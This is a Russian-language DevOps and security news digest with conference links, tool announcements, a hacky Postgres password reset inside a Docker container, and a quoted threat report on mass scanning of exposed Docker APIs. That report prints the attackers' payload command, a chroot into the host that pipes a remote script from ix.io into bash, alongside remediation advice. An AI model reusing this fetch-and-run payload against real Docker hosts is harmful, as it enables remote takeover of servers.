Выложили доклады с DevOpsDays Singapore 2018

Интересный доклад из серии "а как там у них устроено"
The Evolution of Site Reliability Engineering (SRE) at LinkedIn.com
https://www.youtube.com/watch?v=JcGlFZAn8mw

Плейлист на все доклады конференции
https://www.youtube.com/playlist?list=PLpWsyYqY_ehkEruIDKW-WVeA35ItMXCtH

Программа
https://devopsdays.org/events/2018-singapore/program

ClickHouse опубликовали планы на 2020, довольно крутые планы

> Примечение по терминологии. В тексте иногда используется понятие "просранная задача". Это - технический термин, который лишён оскорбительной коннотации и обозначает просранную задачу.

https://github.com/ClickHouse/ClickHouse/blob/master/docs/ru/extended_roadmap.md

Microservices Security Pattern — Implementing a policy based security for microservices with OPA
https://medium.com/microservices-learning/micoservices-security-pattern-implementing-a-policy-based-security-for-microservices-with-opa-f15164a79b0e

Достаточно интересный доклад, особенно та часть, где расписаны причины отказа от Nomad https://habr.com/ru/company/lamoda/blog/451644/

Выложили нарезанные доклады с Big Monitoring Meetup 4
https://www.youtube.com/playlist?list=PL_6HEdnVWofcLTA4eQwOxKHhRBdrwDtMY

Программа тут
https://monhouse.tech/bmm04

JFrog анонсировали свой Registry для Docker и Helm

https://twitter.com/jfrog/status/1197184586087841792

https://jfrog.com/jfrog-launches-free-artifactory-powered-jfrog-container-registry-to-empower-docker-and-helm-community/

А ещё у JFrog есть свой чат с Барухом - https://xn--r1a.website/all_frogs

Компания Cloudflare сообщила об открытии исходных текстов проекта Flan Scan, обеспечивающего сканирования хостов в сети на предмет наличия неисправленных уязвимостей. Flan Scan является надстройкой над сканером сетевой безопасности Nmap, превращающей последний в полнофункциональный инструмент для выявления уязвимых хостов в крупных сетях. Код проекта написан на языке Python и распространяется под лицензией BSD.

https://www.opennet.ru/opennews/art.shtml?num=51912
+
https://github.com/cloudflare/flan

3 истории сбоев Kubernetes в production: anti-affinity, graceful shutdown, webhook

https://habr.com/ru/company/flant/blog/475026/

Cloud Security Auditing. Springer. 2019.

- Котики, а где вы храните свои бесценные бэкапчики? Что сейчас модно использовать?
- В докере. Сейчас все модно пихать в докер

Тут Shodan, в честь своего десятилетия, аккаунты за $1 вместо $49 продаёт.

10 years ago @achillean launched the Shodan website! To celebrate a decade of discovery and growth we're going to offer the membership for $1 (marked down from $49) for the next 24 hours (0:00 UTC to 24:00 UTC): https://www.shodan.io/store/member
(с)
https://twitter.com/shodanhq/status/1198033142130581505

A tool to identify and exploit sudo rules' misconfigurations and vulnerabilities within sudo

Some of the checks/functionalities that are performed by the tool.
 - Misconfigurations
 - Dangerous Binaries
 - Vulnerable versions of sudo - CVEs (NEW - CVE-2019-14287)
 - Dangerous Environment Variables
 - Credential Harvesting
 - Writable directories where scripts reside
 - Binaries that might be replaced
 - Identify missing scripts

https://github.com/TH3xACE/SUDO_KILLER
+
Примеры использования
https://www.youtube.com/playlist?list=PLQPKPAuCA40FMpMKWZLxQydLe7rPL5bml

Continuous Monitoring – автоматизация проверок качества ПО в CI/CD Pipeline
https://habr.com/ru/company/lanit/blog/451630/

Выложены доклады с LVEE-2019 (Linux Vacation Eastern Europe)
https://www.youtube.com/playlist?list=PLNcc67qYVXQ2BwUYuwZ5aQnQP0U03jaN6
Зеркало на Vimeo
https://vimeo.com/showcase/6383859

Список докладов
http://0x1.tv/%D0%9A%D0%B0%D1%82%D0%B5%D0%B3%D0%BE%D1%80%D0%B8%D1%8F:LVEE-2019

Есть линк на программу
https://lvee.org/ru/reports/program
но там протух серт, а это нехорошо.

Ещё только середина ноября, а у нас уже найден докладчик на очередную встречу Санкт-Петербургской группы пользователей GNU/Linux! На этот раз поговорим об облаках на Linux.

Тема доклада: Готовим начинку для облака (cloudinit/cloudbase иное...)

Облаков нынче много, от больших, до просто запускалок на лаптопе, а вы в курсе как сделать что бы образ был не банальным, а с плюшками и бантиками? Не Опенстеком единым как говорится…

Докладчик: Андрей Фесенко


Сбор 27 ноября 2019 в 19:00 (доклад начнётся в 20:00)

Место: 10я линия В.О. д. 33/35, ф-т Географии СПбГУ, ЦДО Феникс (большая белая дверь на первом этаже напротив входа).

как сбросить пароль на postgresql в запущенном docker контейнере без перезапуска

Рубрика "костылим с буквой"

ОСТОРОЖНО прочитанное далее может вызвать кровотечение из глаз и непреодолимое желание расшибить себе лоб рукой.

вы были предупреждены.

Раскатывал я тут хелм сентри... Дано: не работающий Job, который использует пароль из секрета, и криво написанный авторами чарт, в котором слетает пароль пользователя в postgres. Задача - установить в контенере на лету нужный пароль пользователя.



# получаем пароль который должен быть выставлен на постгре
kubectl -n sentry get secret sentry-sentry-postgresql -o yaml | awk '$1=/postgresql-password:/ {print $2}' | base64 -d; echo

# получаем ноду на которой крутится постгре и ssh-шимся на нее
kubectl -n sentry get po -o wide | awk '$1~/.*postgr.*/ {print $7}'

# получаем id контейнера и логинимся туда под рутом
docker ps | grep postgr | grep entry | awk '{print $1}'
docker exec -ti -u0 <container_id> bash

# узнаем пользователя под которым запущен постгре
grep Uid /proc/1/task/1/status

# разрешаем логиниться из-под локалхоста
sed -ibak 's/^\([^#]*\)md5/\1trust/g' /opt/bitnami/postgresql/conf/

# добавляем пользователя в систему и переходим в него
useradd postgres -u 1001
su postgres

# выставляем переменные окружения и релоадим сервис
export PGDATA=/bitnami/postgresql/data
/opt/bitnami/postgresql/bin/pg_ctl reload

# логинимся в postgres и выставляем пароль
psql -U postgres
ALTER USER postgres WITH PASSWORD 'XXX';

возвращаем назад изменения или перестартуем контейнер.

#рукиизжопы #костыли #postgresql #docker #sentry #kubernetes

Каждый год, начиная с 2009, проходит огромное количество конференций под общим названием DevOpsDays

Оценить масштаб действа можно на главном сайте https://devopsdays.org/

Прикоснуться к прекрасному можно будет на DevOpsDays Moscow 2019.

Конференция является некоммерческим мероприятием с едиными международными правилами. На ней нет хантинга участников, рекламы и передачи вашей почты третьей стороне.

Обычно я делаю отдельный акцент на безопасности и там это есть

- Доклад Юрия Шабалина из Swordfish Security "DevSecOps: tips and tricks"

- Lightning Talk от Андрея Бешкова из Softline "Возлюби безопасника своего как самого себя. Построение DevSecOps как гармоничный путь развития"

- В OpenSpace будет обсуждение, что же делать с этим сосурити

Организаторы написали отдельный большой пост про "кто, что и зачем"
https://habr.com/ru/company/scienceman_events/blog/475658/

Проходить конференция будет в Москве, 7 декабря в "Технополисе" (Волгоградский пр-т., 42, к. 5)

Стоимость билета на одного 7000 (по промокоду genon скидка 5%), а если брать на двоих, то по 6000.

Билеты и программа на https://devopsdays.ru/

В сентябре проходил Nextcloud Conference 2019. Там ещё не выложили всех видосов, но не которые есть. Один из доклалов про документацию и мне он понравился

Mythbusting Documentation - Markus Feilner

This talk is meant to bust the myths around documentation. No, the developer is not the most wanted person to write documentation, and also your software can't do without, and it never will - because customers want ist. Proper documentation is a quality of enterprise grade software, it's one of the pillars of open-source success.

https://www.youtube.com/watch?v=Cpug8Iqw3f8

И что б два раза не вставать.
Если вам интересно всякое связанное с документацией, инструментами для этого и т.д. и т.п., то отличный @Nick_Volynkin ведёт канал @docops, там можно почерпнуть знаний и практик.

Opportunistic mass scanning activity detected targeting exposed Docker API endpoints.

These scans create a container using an Alpine Linux image, and execute the payload via:
"Command": "chroot /mnt /bin/sh -c 'curl -sL4 http://ix.io/1XQa | bash;'",

Recons scans largely use ZMap and check the path "/v1.16/version" prior to exploitation.

Ports scanned:
2375/tcp
2376/tcp
2377/tcp
4243/tcp

Remediation recommendation:
Close Docker API ports exposed to the internet.
Terminate unrecognized running containers.

Large uptick in Docker targeted scanning activity started around midnight UTC on 2019-11-24.

Payload script http://ix.io/1XQa has zero detections on VirusTotal (https://www.virustotal.com/gui/file/d898aa7be535f3e12c4d1790abb017bf9d8003a5d9fdceb8918e3a2d8b247838/detection …) despite clear malicious activity.


Тред тут
https://twitter.com/bad_packets/status/1199087675833085959

За ссылку спасибо @ldviolet